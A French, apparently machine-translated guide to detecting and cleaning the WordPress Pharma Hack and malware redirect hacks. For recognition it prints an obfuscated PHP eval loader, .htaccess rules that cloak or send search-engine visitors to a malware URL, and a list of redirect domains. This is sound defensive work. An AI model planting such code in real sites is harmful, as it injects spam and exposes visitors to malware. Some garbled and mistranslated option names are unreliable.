Infecté par Pharma Hack ?

Si votre site WordPress a été infecté par le logiciel malveillant Pharma Hack, nous vous conseillons de consulter notre guide récent sur la manière de détecter, nettoyer et sécuriser votre site WordPress contre le piratage pharmaceutique.

WordPress Pharma / Viagra Hack – Les résultats de Google affichent les résultats de Viagra / Cialis

pharma hack spam

Qu’est-ce que le piratage de l’industrie pharmaceutique ?


Il y a des années, un client m’a demandé de supprimer une page de son site WordPress. Une page concernant les produits pharmaceutiques. J’ai fait des recherches parmi les articles, les pages, les types d’articles personnalisés ou tout autre chose à laquelle j’ai pu penser et j’ai passé des jours à assurer au client qu’aucune page ou article de ce type n’existait sur son site WordPress.

Ils ont péniblement insisté et ont dit avoir trouvé une page en vérifiant les résultats de recherche de leur site sur Google. J’ai vérifié les résultats moi-même et, à ma grande surprise, j’ai trouvé la page qu’ils ont mentionnée. Cette page renvoyait à un autre domaine qui vendait des médicaments en ligne, mais l’URL provenait du site de mon client. Je me suis dit : “C’est probablement une erreur de la part de Google, non ?”.

Faux ! C’était le Pharma Hack.

Alors, qu’est-ce que Pharma Hack exactement ? WordPress Pharma Hack est une méthode d’injection de spam. Son but est de rediriger les visiteurs d’un site par ailleurs légitime vers des sites de vendeurs de pharmacies qui vendent des médicaments interdits (comme le Viagra, le Cialis, le Nexium, etc.) ou qui proposent généralement des médicaments sur ordonnance – sans ordonnance.

Il s’agit d’un système très subtil – on peut le considérer comme un parasite qui se nourrit des pages les plus importantes du site dans le but d’obtenir des liens utiles. Vous et vos visiteurs ne le verrez pas, il ne provoque aucun dysfonctionnement visible et je n’ai pas encore entendu dire qu’un tel piratage a provoqué le crash du site. Cela semble presque inoffensif.

Mais c’est parce que c’est un parasite intelligent – il a besoin d’un hôte vivant et ne veut pas éveiller de soupçons et se faire remarquer. Comme il est très discret, il travaille généralement derrière le rideau pendant des mois et des mois avant que les propriétaires du site ne le remarquent et ne le suppriment. Il est également très probable qu’elle revienne si elle n’est pas enlevée correctement. Cela va lentement dégrader votre référencement et votre réputation en rien, obtenez vous avez été mis sur la liste noire de Google et cela vous a probablement coûté un peu (ou beaucoup) d’argent. Pas si inoffensif, n’est-ce pas ?

Comment savoir si votre site WordPress est infecté par le Pharma Hack ?

  1. Utilisez les opérateurs de recherche avancée de Google
    Comme le piratage est invisible pour vous, vous devez recourir à un outil qui vous aidera à le démasquer : le moteur de recherche. Il vous suffit d’ouvrir Google.com et de rechercher votre nom de domaine (en tapant simplement i.e. domain.com) ou d’utiliser les opérateurs de recherche avancée de Google comme “site:votredomaine.com”, “inurl:votredomaine.com”, etc.

Si vous utilisez l’opérateur “site:votredomaine.com”, Google répertoriera toutes vos pages indexées. Certains des résultats pourraient inclure des liens Pharma Hack comme celui-ci :

Si vous souhaitez être plus précis, vous pouvez lancer la recherche en utilisant “inurl:votredomaine.com viagra” (vous devez bien sûr remplacer “votredomaine.com” par votre propre nom de domaine et vous pouvez également rechercher un autre nom de médicament).

Vous trouverez sur cette page des instructions sur la manière d’utiliser les opérateurs de recherche avancée de Google.

  1. Chercher la page en tant que Googlebot
    La raison pour laquelle les pages ne sont visibles que sur les moteurs de recherche est que le Pharma Hack n’est visible que par certains agents-utilisateurs, comme Googlebot. Cela signifie que même si vous avez trouvé une page sur Google qui redirige vers le site d’un pharmacien, vous ne pourrez pas voir le piratage même si vous consultez la source de la page, car votre navigateur a une chaîne User-Agent différente.

Afin de visualiser la page telle qu’elle serait vue par le Googlebot, vous aurez besoin d’un navigateur Chome User-Agent Switcher ou Firefox User-Agent Switcher add-on.

Après avoir installé le module complémentaire User-Agent Switcher de votre navigateur préféré, vous devez vous rendre sur la page qui s’est affichée comme étant piratée dans les résultats de recherche Google. Ensuite, la chaîne User-Agent devra être modifiée comme suit :

La chaîne User-Agent devra être remplacée par l’une de ces valeurs :

  • Mozilla/5.0 (compatible ; Googlebot/2.1 ; +http://www.google.com/bot.html)
  • Googlebot/2.1 (+http://www.googlebot.com/bot.html)
  • Googlebot/2.1 (+http://www.google.com/bot.html)


Après cela, il vous suffit de consulter la page source et vous pourrez voir la redirection vers le site d’un vendeur de produits pharmaceutiques :

Important : Ne laissez pas l’add-on User-Agent Switcher actif. Comme vous imiterez Googlebot, les sites dotés d’une sécurité adéquate le remarqueront et vous bloqueront temporairement ou définitivement.

Comment fonctionne le Pharma Hack ?

Comme mentionné précédemment, vous et vos visiteurs ne remarquerez aucun changement sur le site. Le Pharma Hack va passer outre la balise titre et insérer des liens de spam dans le contenu de la page. Cette balise de titre modifiée et les liens de spam ne sont visibles que par les moteurs de recherche et les crawlers de moteurs de recherche (comme Googlebot). Cette méthode s’appelle le camouflage.

Où le Pharma Hack cache-t-il son code ?

Comme la plupart des hackers de WordPress, le hack de Pharma utilise le noyau de votre site, le plugin et les fichiers de thème pour stocker ses logiciels malveillants. Dans ce cas, le Pharma Hack utilise également la base de données pour conserver la persistance.

Par le biais de fichiers malveillants dans les répertoires par défaut de WordPress (noyau, plugins, thèmes)

Les fichiers malveillants doivent être placés dans votre répertoire WordPress. Ils contiennent généralement des fonctions telles que base64_decode() et eval(). En ce sens, le Pharma Hack n’est pas différent de tout autre hack.

Par le biais d’un code crypté dans la base de données WordPress
Ce qui est différent, c’est que, avec Pharma Hack, ces fonctions sont stockées dans la base de données sous forme de chaînes de caractères et codées à l’envers, ce qui en rend beaucoup plus difficile à trouver et à éliminer. Lorsque le fichier de piratage est exécuté, il tire les chaînes de la base de données, les décode et les exécute en tant que fonctions.

Par exemple, jetez un coup d’œil à ceci :

JHBoYXJtYWhhY2sgPSAnVGhpcyBpcyBwaGFybWEgaGFjay4nOwplY2hvICRwaGFybWFoYWNrOwo=

On dirait du charabia, mais lorsqu’il est décodé avec la fonction base64_decode(), il le devient :

Bien sûr, le code que j’ai écrit est inoffensif et ne fait rien, mais n’importe quel code malveillant peut avoir l’air identique, comme une chaîne aléatoire de caractères alphanumériques, mais en fait il met en place une redirection sur votre site qui peut amener votre prochain visiteur à une page qui propose le Propranolol sans ordonnance.

Comment supprimer le “Pharma Hack


Comme mentionné précédemment, le Pharma Hack se compose de deux parties, les fichiers de piratage qui permettent un accès détourné et le code crypté dans la base de données.

Afin de supprimer correctement le WordPress Pharma Hack, il faudrait s’occuper des deux. En profondeur. Si l’un des fichiers reste sur le serveur, une réinfection est tout simplement inévitable et vous revenez à la case départ.

Avant de travailler sur votre site WordPress, assurez-vous de faire une sauvegarde de vos fichiers WordPress (fichiers de base, thèmes et plugins) et de la base de données afin de pouvoir la restaurer au cas où quelque chose tournerait mal.

Conseil : Si vous n’êtes pas familier avec l’utilisation du FTP pour vous connecter à votre serveur (ou au moins avec le gestionnaire de fichiers comme celui du cPanel) et, plus important encore, si vous n’êtes pas familier avec phpMyAdmin, je vous déconseille fortement de suivre les instructions ci-dessous. Dans ce cas, je vous suggère de soumettre une demande de correction de piratage pharmaceutique par l’intermédiaire de notre service de suppression des logiciels malveillants.

Suppression des fichiers piratés de WordPress


Je ne vais pas mentir – c’est un travail ennuyeux, mais quelqu’un doit le faire. Ce que vous devez faire, c’est vérifier si des fichiers suspects se trouvent dans les répertoires des plugins et des thèmes. J’espère que vous n’êtes pas un de ces propriétaires de sites qui ont un plugin pour TOUT et qui gardent 12 thèmes inactifs juste au cas où. Si vous êtes cette personne, vous avez des heures, non, des jours pour fouiller dans les dossiers.

Ci-dessous, nous allons montrer un exemple d’inspection et de suppression de fichiers piratés. Vous devez répéter le processus pour tous les fichiers de base, les thèmes et les plugins de votre site WordPress.

Connexion à votre serveur d’hébergement
Vous devrez vous connecter à votre serveur d’hébergement par FTP ou vous connecter à cPanel et utiliser le gestionnaire de fichiers (que j’utiliserai dans les exemples ci-dessous).

Une fois connecté, vous devez vous assurer que l’option “Afficher les fichiers cachés” est cochée :

Allons dans le répertoire des plugins d’Akismet – allez dans “wp-content” -> “plugins” -> “Akismet”.

Trouver les fichiers piratés et les logiciels malveillants

La première chose à laquelle vous devez prêter attention, ce sont les conventions d’appellation. Les fichiers piratés ont généralement une pseudo-extension au milieu (comme .class, .cache, .old) afin d’imiter les véritables fichiers de plugin.

De plus, un point devant le nom du fichier (comme “.htaccess”) cachera le fichier à moins que l’option “Afficher les fichiers cachés” ne soit activée. C’est toujours un motif de suspicion.

Pour confirmer, le contenu de ces dossiers devrait ressembler à ceci :

< ? php $XZKsyG= ‘as’;$RqoaUO= ‘e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
= “b”.$XZKsyG.$RqoaUO.(64). “_”. “d”.$RqoaUO. “c”. “o”. “d”.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

Si vous n’êtes pas sûr que le fichier fait partie intégrante du plugin, vous pouvez télécharger la nouvelle version du plugin à partir de WordPress.org et comparer le contenu du répertoire du plugin sur votre serveur et l’installer.

Le fichier .htaccess

Le fichier .htaccess serait également un bon endroit pour vérifier. C’est un exemple de code qui ne devrait pas être là :

RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] #checks for Google, Yahoo, msn, aol and bing crawler
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ somehackfile.php?$1 [L] #redirecte vers un fichier piraté

Si vous voyez un code comme celui-ci, il est préférable de le supprimer. Bien entendu, vous devez sauvegarder une copie de sauvegarde du fichier .htaccess au cas où. Si vous avez besoin de recréer le fichier, allez simplement dans votre tableau de bord WordPress, puis allez dans “Paramètres” -> “Permaliens” et cliquez sur “Enregistrer” (vous n’avez pas à modifier la structure des permaliens) et le fichier .htaccess sera régénéré.

Rechercher les différences de contenu des fichiers

Cela peut être un peu trop pour certains plugins qui ont un grand nombre de fichiers (comme le JetPack). Vous pouvez donc aussi utiliser le scanner d’exploitation ou un plugin de sécurité similaire pour vérifier les modifications de fichiers. Le plugin Exploit Scanner recherchera dans tous les fichiers de base de WordPress, les thèmes et plugins de tiers qui sont distribués par le dépôt officiel de WordPress, ainsi que dans les tables des messages et commentaires de votre base de données, les entrées suspectes et les noms de fichiers inhabituels. L’inconvénient est que le plugin Exploit Scanner génère un grand nombre de faux positifs. Vous devez donc vérifier chaque résultat qu’il produit alors qu’il ne fonctionne pas avec les plugins premium ou les plugins personnalisés.

Une fois que vous avez découvert quels fichiers sont piratés et distribuent des logiciels malveillants, vous devez les supprimer immédiatement. Si vous avez trouvé un plugin piraté qui contient un grand nombre de fichiers, il est probablement plus efficace de supprimer le plugin entier et de le réinstaller à partir de zéro. La plupart du temps, les options et les paramètres des plugins sont stockés dans la base de données de votre site, de sorte que la restauration des fichiers de plugins par défaut ne vous portera pas préjudice.

Une fois que vous aurez supprimé tous vos fichiers WordPress piratés, les symptômes de Pharma Hack devraient disparaître et les résultats de recherche de votre site reviendront à la normale après quelques jours (Google doit parcourir à nouveau votre site pour vérifier qu’il est propre). Toutefois, cela ne met pas fin au processus de nettoyage, car vous devrez encore traiter le code résiduel dans la base de données.

Gardez à l’esprit que si des fichiers piratés sont laissés derrière vous, votre site WordPress sera tôt ou tard réinfecté par le Pharma Hack. Cela dit, passons au nettoyage de la base de données.

Suppression des codes malveillants de la base de données WordPress

Toutes les instructions ci-dessous impliquent une manipulation de la base de données, il est donc important de ψreate une sauvegarde de votre base de données (si vous ne l’avez pas déjà fait)
et suivez bien les instructions, car toute improvisation pourrait faire planter votre site.

Encore une fois, si vous n’êtes pas à l’aise pour effectuer des modifications via phpMyAdmin, c’est une bonne idée d’engager un professionnel ou d’essayer notre service de suppression des logiciels malveillants.

Connectez-vous à phpMyAdmin

Si vous utilisez un pack d’hébergement avec cPanel, cette étape est facile. Il vous suffit de cliquer sur l’icône “phpMyAdmin” :

Sinon, vous aurez besoin d’une URL de connexion phpMyAdmin, d’un nom d’utilisateur et d’un mot de passe. Votre fournisseur d’hébergement devrait pouvoir vous aider à cet égard.

Sélectionner la bonne base de données

Une fois connecté, vous devrez sélectionner la bonne base de données, pour vous assurer que vous effectuez les modifications au bon endroit.

Si vous avez plus d’une base de données, vous pouvez vérifier votre fichier wp-config.php et rechercher le nom de la base de données. Il sera dans la ligne de code suivante – define(‘DB_NAME’, ‘yourdatabasename’) ;

Recherche de codes malveillants

Maintenant que vous avez sélectionné la bonne base de données, vous devrez naviguer vers la table “wp_options” (le préfixe de la table peut être différent selon la façon dont il a été défini lors de l’installation de votre site WordPress). Une liste de tableaux WordPress doit être affichée sur le côté gauche de l’écran (vous pouvez soit cliquer sur cette entrée, soit sur le bouton “Parcourir” de la liste du milieu) :

Après avoir sélectionné la table wp_options, vous devrez rechercher les entrées malveillantes de la base de données en utilisant l’onglet Recherche en haut de la page.

Les entrées que vous devrez rechercher en les saisissant dans le champ “nom_option” sont les suivantes :

  • wp_check_hash
  • support_générique_de_classe
  • widget_generic_support
  • ftp_credentials
  • fwp
  • rss_%

Attention ! Dans ce cas, vous devez supprimer toutes les correspondances sauf rss_language, rss_use_excerpt et rss_excerpt_length (il s’agit d’entrées légitimes de la base de données WordPress).

Faites bien attention à ne pas supprimer des informations importantes dans le tableau wp_options, car cela pourrait produire des erreurs ou même faire planter votre site WordPress.

Comment vérifier que votre site WP est propre

Répétez la recherche sur Google en utilisant les mêmes opérateurs de recherche

Après avoir supprimé les fichiers piratés de WordPress de votre site, les résultats de recherche sur Google devraient se normaliser. Vous devez ensuite répéter la recherche Google, en utilisant les opérateurs de la Recherche avancée pour vérifier si certaines des pages apparaissent toujours dans les résultats.

Il ne serait pas surprenant que certains des résultats de Pharma Hack soient encore visibles. Google indexe votre site depuis un certain temps et il faut parfois plusieurs jours, voire plusieurs semaines, pour réparer les dégâts. Cela pourrait également signifier que certains fichiers piratés sont toujours présents sur les serveurs, vous devriez donc répéter la procédure de nettoyage de Pharma Hack.

Utiliser les outils Google pour les webmasters

Les Google Webmaster Tools devraient être utilisés pour réindexer le site après que le Pharma Hack ait été complètement supprimé. L’option État de l’index et logiciels malveillants peut vous indiquer si le site est toujours signalé comme infecté par Google.

Comment scanner votre site à la recherche d’entrées piratées

Il existe un certain nombre de plugins de sécurité qui peuvent déterminer s’il y a ou non une infection par un malware sur votre site. Comme indiqué précédemment, le Pharma Hack peut être extrêmement difficile à attraper, il est donc tout à fait possible qu’il soit manqué par un plugin de sécurité.

Il existe également des scanners de site, que différentes entreprises fournissent gratuitement.

Comment forcer Google à ré-indexer votre site WordPress gratuit Pharma Hack

Soumettre un nouveau plan du site

Un plan du site contient une liste de toutes les pages et de tous les messages de votre site. Le fait de soumettre le plan du site pourrait accélérer le processus de réindexation. Si vous avez déjà un plan de site, essayez de le supprimer et de le soumettre à nouveau. Cela permettra également de supprimer toutes les pages et URL liées aux produits pharmaceutiques (le cas échéant).

L’outil de suppression de contenu obsolète de Google

Si certaines pages sont encore indexées avec le Pharma Hack, elles doivent être soumises pour suppression. Même si votre site WordPress est exempt de Pharma Hack, certaines des pages piratées apparaîtront toujours dans le résultat de recherche de Google. Google vous permet désormais de demander la suppression de ces pages obsolètes via l’outil Supprimer le contenu obsolète. Si c’est le cas, copiez l’URL comme indiqué dans les résultats de recherche Google, puis collez-la dans l’outil et demandez sa suppression.

Comment sécuriser le site pour d’éventuelles futures attaques de piratage

Toute tentative de piratage réussie (ou non) commence par une tentative d’exploitation des faiblesses du site. Le plus souvent, l’infection par des logiciels malveillants est possible en raison de l’utilisation de logiciels obsolètes ou périmés, comme le noyau, les thèmes et les plugins de WordPress. Des mises à jour régulières sont une étape importante pour accroître la sécurité de votre site.

Après avoir supprimé le logiciel malveillant, vous pouvez modifier les informations d’identification FTP, supprimer les utilisateurs inconnus et limiter les privilèges des utilisateurs. Il est également judicieux de mettre en place un plugin de sécurité et de surveiller votre site.

Nous vous suggérons de lire notre article détaillé sur la manière de protéger un site WordPress contre le piratage. Il est long mais nous sommes certains qu’il vous aidera à sécuriser votre site WordPress contre les pirates comme Pharma et les redirections de logiciels malveillants.

Répétez le nettoyage de la pharmacie pour tous vos sites WordPress

Si vous hébergez plus d’un site WordPress sous le même compte de piratage, vous DEVEZ nettoyer tous les sites, sinon il sera piraté encore et encore. Il est très fréquent que nous recevions des demandes de hacking pour un site WordPress et que nous y trouvions deux sites ou plus sous le même compte d’hébergement. Dans ce cas, nous suggérons à nos clients de nous laisser les nettoyer tous ou bien nous préférons abandonner la demande car nous ne pouvons pas garantir que le site dont le nettoyage est demandé restera propre dans un avenir proche.

Dernières réflexions

Le Pharma Hack existe depuis longtemps et il est en constante évolution. L’enlever est toujours difficile et prend du temps, surtout si la réinfection se produit. Les étapes de diagnostic et de réparation du hack fournies dans cet article devraient vous aider à lutter efficacement contre ce problème et à réduire les chances qu’il se reproduise à l’avenir. Toutefois, si vous n’êtes pas sûr d’avoir réussi à supprimer le Pharma Hack et à sécuriser votre site contre les futures tentatives de piratage, vous pouvez opter pour nos services d’assistance et de maintenance WordPress. Il peut s’agir d’un coût supplémentaire maintenant, mais il peut vous faire économiser de l’argent à long terme.

Si votre site WordPress a été infecté par le piratage japonais, nous vous suggérons de consulter notre guide Comment identifier et réparer le piratage de mots-clés japonais.

Comment réparer le piratage de redirection de logiciels malveillants WordPress

Faire face à un piratage de redirection d’un logiciel malveillant WordPress, en général, est toujours une expérience frustrante. Les logiciels malveillants peuvent se présenter sous de nombreuses formes et présenter différents symptômes, pour ainsi dire. Elle peut modifier la présentation de votre site, ce que l’on appelle la défiguration, elle peut faire planter votre site ou même entraîner une perte partielle ou totale de contenu. Parfois, vous ne savez même pas qu’il est là.

Tout dépend du motif de l’attaque. Certaines personnes le font juste pour le plaisir. Oui, je sais – vous avez investi beaucoup d’argent, de temps et d’efforts dans votre site et cela fait vraiment mal de penser que quelqu’un le casse juste parce qu’il le peut et le veut. D’autre part, certains le font pour l’argent. Dans la plupart des cas, vous ne saurez pas pourquoi cela s’est produit.

La question la plus importante sera toujours : comment. Comment cela s’est-il produit et comment y remédier ? Dans cet article, nous aborderons le piratage de redirection de WordPress et ce qu’il faut faire à ce sujet.

Qu’est-ce qu’un “WordPress Malware Redirect Hack” ?

Le WordPress Redirect Hack est un processus qui redirige les visiteurs vers des sites de spam et de phishing dans le but de générer des impressions publicitaires. Il peut également s’agir d’une tentative de compromettre l’ordinateur d’un visiteur en lui proposant d’installer un logiciel qui agira en fait comme un logiciel malveillant.

À quoi cela ressemble-t-il ?

Diagnostiquer les redirections malveillantes de WordPress est assez simple car les symptômes sont évidents. Vous visitez votre site et au lieu de voir votre page d’accueil, vous êtes redirigé vers un autre endroit qui n’a absolument rien à voir avec votre site.

Les conséquences d’une redirection du malware WordPress

Quelles sont donc les conséquences d’un Redirect Hack (outre une hausse de votre tension artérielle) ? Tout ou partie de ces situations peuvent se produire :

  1. La réputation de votre site et de votre référencement sera dégradée (voire détruite)

Les visiteurs perdent tout simplement confiance après avoir été constamment redirigés vers des sites suspects.

2.Votre hébergeur pourrait fermer votre site

C’est exact. Votre fournisseur d’hébergement peut le faire si votre site est sur le serveur partagé afin d’éviter que d’autres sites ne soient également infectés.


3.Les dispositifs des visiteurs du site peuvent être compris et conduire à une faille de sécurité

Comme mentionné, il existe des moyens de faire parvenir des logiciels malveillants à l’ordinateur du visiteur et d’extraire des données sensibles.

4.Vous pourriez être mis sur la liste noire de Google
Google s’efforcera de protéger la réputation de ses résultats de recherche et marquera votre site comme étant peu sûr.

Comment détecter la redirection malveillante de WordPress

Pouvoir identifier le fichier compromis est l’étape la plus importante dans la suppression du logiciel malveillant. Toute installation de WordPress comporte des milliers de fichiers. Il va sans dire que la vérification manuelle de chacun d’entre eux n’est possible qu’en théorie.

L’idée principale ici est d’apprendre à confirmer que votre site a été compromis par le piratage de redirection et de décider ensuite de la meilleure marche à suivre pour le supprimer.

  1. Consulter le fichier .htaccess

Le .htaccess ne fait pas partie de WordPress. Il s’agit en fait d’un fichier de configuration du serveur Apache et, en tant que tel, il peut modifier le comportement par défaut du serveur. Le noyau de WordPress et certains plugins peuvent modifier automatiquement le .htaccess pour permettre aux utilisateurs de configurer les paramètres de sécurité, les redirections, les en-têtes de cache, etc.

Si un hacker met la main sur le fichier .htaccess, il peut lui aussi créer des redirections.

Il s’agit du contenu d’un fichier .htaccess généré par défaut par WordPress

Commencer WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
Réécrire la règle . /index.php [L]

END WordPress

Le fichier .htaccess peut avoir beaucoup plus de lignes, pour le contrôle du cache, la sécurité et la redirection https et il n’y a pas de quoi s’inquiéter. Toutefois, certaines lignes de réacheminement sont préoccupantes.

Un des types d’attaques .htaccess redirige les utilisateurs qui proviennent des moteurs de recherche. Voici un exemple de ce code :

RewriteCond %{HTTP_REFERER} google. [OU] #vérifie si le visiteur a été référé par Google
RewriteCond %{HTTP_REFERER} .ask. [OR] #check if the visitor has been referred by Ask.com
RewriteCond %{HTTP_REFERER} .yahoo. [OU] #vérifie si le visiteur a été référé par Yahoo
RewriteCond %{HTTP_REFERER} .baidu. [OU] #check if the visitor has been referred by Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #si l’une des règles ci-dessus est “vraie”, c’est ici que l’utilisateur est redirigé

Cela peut également se faire sous forme abrégée, alors faites attention à cela aussi :

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.(google|ask|yahoo|baidu).(.) #Check if the visitor has been referred by Google or Ask or Yahoo or Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #La même redirection

Ce type de redirection est très bien dissimulé et il peut s’écouler des mois avant que le propriétaire du site ne le remarque ou qu’un visiteur ne le signale. En effet, toute personne se rendant directement sur le site ne remarquera aucune différence. C’est essentiellement le même principe que celui suivi par Pharma Hack.

Il existe également un moyen de rediriger toutes les pages d’erreur (comme 404, 503, etc.) vers des sites malveillants en utilisant l’extrait de fichier .htaccess suivant

RewriteEngine On
ErrorDocument 404 http://malicioussite.com/malware.php

Ce code .htaccess supplémentaire redirigera le visiteur vers un site malveillant au lieu d’un modèle de 404 pages.

  1. Recherchez les redirections malveillantes dans vos fichiers, thèmes et plugins WordPress

Le fait de voir un code similaire aux exemples présentés ci-dessus confirme que votre site a été piraté. La suppression de ces lignes empêchera vos visiteurs d’être redirigés, mais malheureusement, cela ne signifie pas que le piratage de redirection des logiciels malveillants a été entièrement supprimé. Il y a probablement des fichiers malveillants détournés que le pirate informatique a utilisés pour accéder à votre site. Si ces portes dérobées restent sur le site, votre .htaccess et votre site WordPress seront éventuellement modifiés et infectés à nouveau.

Si vous n’êtes pas sûr que le code de votre .htaccess soit un logiciel malveillant ou non, ou si vous ne vous sentez pas à l’aise pour le modifier, il peut être judicieux de créer une sauvegarde et de la remplacer par le htaccess WordPress par défaut.

  1. Vérifiez que votre thème header.php et footer.php ne contient pas d’injections de code malveillant

Header.php et footer.php sont des fichiers de modèles de base. Tous les thèmes WordPress en ont. Ils peuvent avoir des fichiers supplémentaires qui sont appelés à partir de header.php et footer.php mais ces deux fichiers seront toujours là. Une exception est si votre thème utilise un thème enfant qui ne nécessite rien d’autre qu’un fichier style.css pour fonctionner mais dans ce cas, header.php et footer.php sont déjà chargés à partir du thème parent. Conclusion – ils seront chargés d’une manière ou d’une autre.

Les pirates informatiques le savent, c’est pourquoi ils mettent souvent un code malveillant dans ces deux fichiers ou dans les fichiers qui y sont inclus. Ce code n’est pas si difficile à repérer une fois que vous savez ce qu’il faut chercher. Voici quelques caractéristiques du code :

  • Il sera souvent obscurci
  • Il aura les fonctions “base64()” et “eval()”.

Consultez l’exemple suivant :

Le code ci-dessus est un exemple de ce que vous pourriez trouver dans votre fichier header.php. Voici à quoi cela ressemble lorsqu’il est décodé avec la fonction base64_decode() :

L’exemple de code est destiné à rediriger les visiteurs en fonction de certains paramètres vers un domaine appelé default7 .com et, plus bas, il comporte une chaîne de redirection basée sur certaines conditions qui s’appliquent individuellement aux visiteurs du site piraté. Les pirates de redirection de logiciels malveillants sont connus pour utiliser des chaînes de redirection qui redirigent les visiteurs de sites infectés vers les domaines suivants :

  • default7 .com
  • test246.com
  • test0 .com
  • distinctfestive .com
  • ableoccassion.com

Si vous en voyez la moindre mention dans votre dossier, c’est la confirmation à 100% que vous avez été piraté.

Comment nettoyer le hack de redirection des logiciels malveillants de WordPress
Si vous avez trouvé des injections de code similaires dans les fichiers de votre site WordPress, il y a trois choses que vous pouvez faire pour récupérer votre site WordPress piraté. Avant de poursuivre la lecture, nous devons vous avertir qu’il faut d’abord créer une sauvegarde des fichiers et de la base de données de votre site WordPress et la compresser dans un fichier zip. Enfin et surtout, stockez le fichier localement pour pouvoir y accéder facilement si vous décidez de le restaurer.

  1. Remplacez votre thème WordPress actif par une copie fraîchement téléchargée
    Supprimez vos fichiers de thème WordPress actuels et remplacez-les par ceux que vous venez de télécharger. N’oubliez pas que si vous avez codé en dur des modifications dans vos fichiers de thème, vous devrez les appliquer à nouveau.
  2. Remplacer les fichiers WordPress de base infectés par les fichiers originaux
    La prochaine étape consiste à supprimer vos anciens fichiers de base WordPress et à les remplacer par ceux que vous venez de télécharger sur WordPress.org. Dans ce cas, vous devez vous assurer que vous appliquez également les mises à jour en cours. Une nouvelle installation de WordPress compte actuellement 1835 fichiers. Ajoutez des plugins, des thèmes et ce nombre augmente rapidement. Vous ne pouvez pas vérifier tous les dossiers. C’est pourquoi il est important de parcourir les dossiers dans un certain ordre.

Le premier fichier qui se charge lorsque quelqu’un visite votre site est “index.php”. Il est assez facile de dire si le dossier a été falsifié. Il devrait avoir une taille de 418 à 420 octets et ne devrait charger qu’un seul fichier en utilisant la fonction “require()” :
require( dirname( FILE ) . /wp-blog-header.php’ ) ;

Si vous voyez un autre fichier chargé avec la fonction “require()”, il s’agit très probablement d’un malware.

Il en va de même pour “wp-config.php”, qui ne doit comporter qu’une seule ligne où la fonction “require()” a été utilisée (tout en bas) :

require_once( ABSPATH . ‘wp-settings.php’ ) ;

Cependant, certains hébergeurs chargent certains fichiers ou plugins requis via le fichier wp-config.php, ce qui peut ajouter une certaine confusion. Mais voici la différence : un fournisseur d’hébergement ne mettra jamais le fichier dans le répertoire wp-admin et wp-includes, mais plutôt dans wp-content/plugins. Si une fonction “require()” a été appelée pour récupérer un fichier autre que wp-settings.php dans ces répertoires, il s’agit très probablement d’un malware.

  1. Remplacer tous vos plugins WordPress
    C’est la meilleure solution lorsqu’il s’agit de préserver la fonctionnalité et la présentation du site. C’est également la pire solution si vous avez laissé des parties du code du logiciel malveillant. Cela peut entraîner des erreurs, une réinfection, un effondrement du site, etc. Si votre thème a été personnalisé, demandez à votre développeur de supprimer les logiciels malveillants pour vous, ou s’ils ne sont pas disponibles, engagez un professionnel pour le faire à votre place.
  2. Supprimer les sauvegardes de vos fichiers WordPress
    Si vous conservez des sauvegardes de vos installations WordPress, il y a de fortes chances pour qu’elles contiennent également des logiciels malveillants et que vous ne puissiez donc pas les utiliser pour restaurer entièrement votre site WordPress. Si ces sauvegardes sont stockées sous forme de fichiers bruts, les logiciels malveillants peuvent réinfecter votre site à maintes reprises.
  3. Nettoyez vos fichiers de cache WordPress
    La mise en cache de votre site WordPress est un moyen de stocker vos fichiers statiques, ce qui accélère leur chargement. Cela signifie également que les fichiers de logiciels malveillants sont également mis en cache et prêts à être manipulés par les pirates. Nous vous suggérons de supprimer tout le cache de votre site et de le désactiver complètement jusqu’à ce que vous soyez sûr de l’avoir nettoyé.
  4. Modifier vos données de connexion à l’administration de WordPress
    Un site WordPress piraté signifie que tout le contenu de votre site, y compris les identifiants des utilisateurs de l’administration, a été piraté ou manipulé. Cela dit, vous devez changer tous vos noms d’utilisateur et mots de passe administratifs avec de nouveaux. Veillez à réinitialiser également vos clés de sel wp-config.php afin que tous les utilisateurs connectés soient déconnectés de force.
  5. Ne pas utiliser plus de 2 comptes admin
    Nous suggérons fortement de ne laisser qu’un ou deux comptes d’administrateur et de déclasser tous les autres pour des rôles d’utilisateurs inférieurs tels qu’auteurs et éditeurs. Moins d’administrateurs signifie moins de possibilités d’avoir un de ces comptes piraté et d’infecter votre site WordPress avec des logiciels malveillants.

Si vous avez besoin de plus d’un ou deux administrateurs actifs, vous pouvez utiliser notre propre plugin d’administration des utilisateurs WP afin de programmer des changements de rôle ou des mises à niveau. De cette façon, vous pouvez définir un utilisateur comme administrateur pour une durée déterminée et le rétrograder automatiquement au rang d’auteur ou à tout autre rôle d’utilisateur privilégié.

  1. Supprimer les thèmes et plugins inactifs
    L’un des points d’entrée les plus courants pour les pirates est l’inactivité et l’abandon des plugins et des thèmes. Si vous n’utilisez pas un plugin ou un thème, il est préférable de le compléter, de le supprimer de votre site WordPress, sinon vous risquez de vous faire pirater encore et encore à cause de vulnérabilités trouvées dans des thèmes qui ne sont plus développés.
  2. Modifier vos données de connexion à la base de données
    Les sites WordPress piratés sont également la conséquence de l’utilisation de données de connexion simples et amusantes pour leur base de données MySQL. Assurez-vous de créer un nom d’utilisateur et un mot de passe uniques pour chaque base de données WordPress que vous créez sous votre compte d’hébergement.
  3. Vérifiez votre fichier wp-config.php pour les injections de script
    L’un des premiers fichiers qu’un pirate informatique utilise pour injecter des logiciels malveillants est wp-config.php. Ceci est le principal

Il s’agit du fichier principal de WordPress. Son exploitation permet donc au pirate de diffuser plus facilement des logiciels malveillants dans tous les fichiers de votre site WordPress. Il peut également être utilisé pour infecter d’autres sites WordPress hébergés sous le même compte d’hébergement.

